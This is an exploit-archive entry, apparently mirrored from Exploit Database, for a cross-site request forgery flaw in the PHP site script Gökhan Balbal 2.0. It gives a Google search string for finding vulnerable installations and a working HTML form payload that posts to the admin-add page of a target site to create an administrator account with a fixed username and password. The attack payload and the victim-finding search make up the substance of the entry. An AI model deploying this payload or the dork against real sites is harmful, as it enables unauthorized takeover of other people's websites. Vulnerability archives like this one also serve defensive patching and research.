Gökhan Balbal Script 2.0 – Cross-Site Request Forgery

• Exploit Database
• 18 阅读

• 作者： KnocKout
  日期： 2015-12-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38928/

• .______________
  ||__/||_____\ _\_______ ____ 
  ||\/ ||\\///_\\___ \_/ __ \
  | Y\/^ /><\\_/ \| \/\___/
  |___|/\____ |/__/\_ \\_____/__|\___>
   \/|__|\/\/\/
   _____________________________ 
  / _____/\_ _____/\_ ___ \
  \_____\|__)_ /\\/ 
  /\ |\\ \____ 
   /_______//_______/ \______/
   \/ \/ \/ 
  Gökhan Balbal v2.0=> Cross-Site Request Forgery Exploit (Add Admin)
  ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  [+] Author : KnocKout
  [~] Contact : knockout@e-mail.com.tr
  [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
  [~] Þeker Insanlar :ZoRLu, ( milw00rm.com ), 
  Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
  					KedAns-Dz, b3mb4m
  ###########################################################
  ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  |~Web App. : Gökhan Balbal
  |~Affected Version : v2.0
  |~Software: http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html
  |~RISK : High
  |~Google Keyword :"DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi"
  
  ##################++ Exploit ++ ######################################
  
   <html>
  <body>
  <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
  <input type="hidden" name="kadi" value="knockout" />
  <input type="hidden" name="sifre" value="password" />
  <input type="hidden" name="Submit" value="Exploit!" />
  	<input type="submit" value="Submit request" />
  </form>
  </body>
  </html>
  
  ############################################################